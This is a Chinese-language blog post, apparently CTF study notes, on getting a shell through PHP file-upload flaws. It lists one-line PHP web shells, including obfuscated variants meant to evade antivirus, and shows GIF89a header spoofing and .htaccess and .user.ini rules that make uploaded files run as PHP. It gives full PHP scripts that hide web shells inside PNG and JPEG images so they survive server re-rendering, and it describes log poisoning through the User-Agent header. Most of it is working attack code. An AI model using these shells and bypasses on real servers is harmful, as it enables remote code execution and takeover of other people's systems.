一、上传文件后缀
一般这种题会对上传文件的后缀名有严格的限制,例如只允许jpg、png、zip
等后缀的文件上传,这种情况可以先把一句话木马写进允许的后缀名文件中,再用burpsuite
抓包修改文件后缀名就可以getshell
。当然如果没有限制直接用php、phtml、php2
等后缀的文件直接传一句话木马getshell
。
二、木马构造
正如对文件后缀名的限制一样,对文件里面的内容也会有各种各样的过滤,下面介绍几种绕过方式:
- 一般的马儿:
<?php eval($_POST['cmd']);?>
- 没有PHP的马儿
<?= eval($_POST['cmd']);?>
<? eval($_POST['cmd']);?>
<% eval($_POST['cmd']);%>
- 有PHP的马儿
<script language="php">eval($_POST['shell']);</script>
- 特殊马儿: 过滤[]:用{}代替
<?= eval($_POST{'cmd'});?>
直接拿flag的变形马儿
<? echo `tac /var/www/html/f\*`;?> <? echo `tac /var/www/html/f\*`?>
免杀马儿:
<?php $a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>
<?php $a=substr('1s',1).'ystem'; $a($_REQUEST[1]); ?>
注:当有文件头的判断时,在文件头加上GIF89a
实现绕过
三、 .htaccess 和.user.ini 配置文件妙用
.htaccess
自定义出错界面
ErrorDocument 状态码 文件路径或字符串
SetHandler和ForceType
强制所有匹配的文件被一个指定的处理器处理
用法
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
AddHandler
AddType application/x-httpd-php .htm,则.htm文件也可以执行php程序
AddHandler cgi-script .yyy 则扩展名为.yyy的文件作为 CGI 脚本来处理
AddType
AddType
可以将给定的文件扩展名映射到指定的内容类型
AddType application/x-httpd-php .xxx 同上AddHandler的作用
php_value
php_value auto_prepend_file 1.txt 在主文件解析之前自动解析包含1.txt的内容
php_value auto_append_file 2.txt 在主文件解析后自动解析1.txt的内容
php_value include_path "xxx" 使作用范围内的php文件在文件头/尾自动include指定文件,支持php伪协议
php_value pcre.backtrack_limit 0 使php正则失效
名字 | 默认 | 可修改范围 | 更新日志 |
---|---|---|---|
pcre.backtrack_limit | 100000 | PHP_INI_ALL | php 5.2.0 起可用 |
pcre.recursion_limit | 100000 | PHP_INI_ALL | php 5.2.0 起可用用 |
pcre.jit | 1 | PHP_INI_ALL | PHP 7.0.0 起可用 |
htaccess把自己指定当做 php文件处理
当前目录下有php文件
php_value auto_append_file .htaccess
#<?php phpinfo();
当前目录下无php文件
<Files .htaccess>
//ForceType application/x-httpd-php
SetHandler application/x-httpd-php
Require all granted
php_flag engine on
</Files>
php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();
或
<FilesMatch .htaccess>
//ForceType application/x-httpd-php
SetHandler application/x-httpd-php
Require all granted
php_flag engine on
</FilesMatch>
php_value auto_prepend_fi\
le .htaccess
#<?php phpinfo();
.user.ini
php 配置项中有两个配置可以起到一些作用
auto_prepend_file = <filename> //包含在文件头
auto_append_file = <filename> //包含在文件尾
.user.ini 使用范围很广,不仅限于 Apache 服务器,同样适用于 Nginx 服务器,只要服务器启用了 fastcgi
模式 (通常非线程安全模式使用的就是 fastcgi
模式)。
局限
在.user.ini 中使用这条配置的使用也说了是在同目录下的其他.php 文件中包含配置中所指定的文件,也就是说需要该目录下存在.php 文件,通常在文件上传中,一般是专门有一个目录用来存在图片,可能小概率会存在.php 文件。
但是有时可以使用 ../
来将文件上传到其他目录,达到一个利用的效果。
四、图片马制作
有时候上传文件的图片需要经过二次渲染绕过,下面提供制作图片马脚本:
1. png马
<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
0x66, 0x44, 0x50, 0x33);
$img = imagecreatetruecolor(32, 32);
for ($y = 0; $y < sizeof($p); $y += 3) {
$r = $p[$y];
$g = $p[$y+1];
$b = $p[$y+2];
$color = imagecolorallocate($img, $r, $g, $b);
imagesetpixel($img, round($y / 3), 0, $color);
}
imagepng($img,'1.png'); #保存在本地的图片马
?>
运行脚本即可生成,这里的一句话木马是:
<?$_GET[0]($_POST[1]);?>
2. jpg马
<?php
$miniPayload = "<?=`tac /f*`?>";
if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
die('php-gd is not installed');
}
if(!isset($argv[1])) {
die('php jpg_payload.php <jpg_name.jpg>');
}
set_error_handler("custom_error_handler");
for($pad = 0; $pad < 1024; $pad++) {
$nullbytePayloadSize = $pad;
$dis = new DataInputStream($argv[1]);
$outStream = file_get_contents($argv[1]);
$extraBytes = 0;
$correctImage = TRUE;
if($dis->readShort() != 0xFFD8) {
die('Incorrect SOI marker');
}
while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
$marker = $dis->readByte();
$size = $dis->readShort() - 2;
$dis->skip($size);
if($marker === 0xDA) {
$startPos = $dis->seek();
$outStreamTmp =
substr($outStream, 0, $startPos) .
$miniPayload .
str_repeat("\0",$nullbytePayloadSize) .
substr($outStream, $startPos);
checkImage('_'.$argv[1], $outStreamTmp, TRUE);
if($extraBytes !== 0) {
while((!$dis->eof())) {
if($dis->readByte() === 0xFF) {
if($dis->readByte !== 0x00) {
break;
}
}
}
$stopPos = $dis->seek() - 2;
$imageStreamSize = $stopPos - $startPos;
$outStream =
substr($outStream, 0, $startPos) .
$miniPayload .
substr(
str_repeat("\0",$nullbytePayloadSize).
substr($outStream, $startPos, $imageStreamSize),
0,
$nullbytePayloadSize+$imageStreamSize-$extraBytes) .
substr($outStream, $stopPos);
} elseif($correctImage) {
$outStream = $outStreamTmp;
} else {
break;
}
if(checkImage('payload_'.$argv[1], $outStream)) {
die('Success!');
} else {
break;
}
}
}
}
unlink('payload_'.$argv[1]);
die('Something\'s wrong');
function checkImage($filename, $data, $unlink = FALSE) {
global $correctImage;
file_put_contents($filename, $data);
$correctImage = TRUE;
imagecreatefromjpeg($filename);
if($unlink)
unlink($filename);
return $correctImage;
}
function custom_error_handler($errno, $errstr, $errfile, $errline) {
global $extraBytes, $correctImage;
$correctImage = FALSE;
if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
if(isset($m[1])) {
$extraBytes = (int)$m[1];
}
}
}
class DataInputStream {
private $binData;
private $order;
private $size;
public function __construct($filename, $order = false, $fromString = false) {
$this->binData = '';
$this->order = $order;
if(!$fromString) {
if(!file_exists($filename) || !is_file($filename))
die('File not exists ['.$filename.']');
$this->binData = file_get_contents($filename);
} else {
$this->binData = $filename;
}
$this->size = strlen($this->binData);
}
public function seek() {
return ($this->size - strlen($this->binData));
}
public function skip($skip) {
$this->binData = substr($this->binData, $skip);
}
public function readByte() {
if($this->eof()) {
die('End Of File');
}
$byte = substr($this->binData, 0, 1);
$this->binData = substr($this->binData, 1);
return ord($byte);
}
public function readShort() {
if(strlen($this->binData) < 2) {
die('End Of File');
}
$short = substr($this->binData, 0, 2);
$this->binData = substr($this->binData, 2);
if($this->order) {
$short = (ord($short[1]) << 8) + ord($short[0]);
} else {
$short = (ord($short[0]) << 8) + ord($short[1]);
}
return $short;
}
public function eof() {
return !$this->binData||(strlen($this->binData) === 0);
}
}
?>
运行脚本命令:
php jpg_payload.php 1.jpg
注:jpg马制作比较玄学,成功有一定概率,建议找一张正经的jpg图片(不是通过改后缀名获得的)先上传到本地服务器上再下载回来,然后再运行脚本生成图片马。
五、日志包含
有时候文件内容过滤的太多了,无法实现getshell,这时我们就可以尝试通过日志里面加入一句话木马实现getshell。
首先需要在文件.user.ini
中写入以下代码:
#nginx
auto_prepend_file=/var/log/nginx/access.log
#apache
auto_prepend_file=/var/log/httpd/access.log
再在user-agent
中加入一句话木马实现getshell
六、利用session条件竞争
还没研究明白,还是太菜了。
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至1004454362@qq.com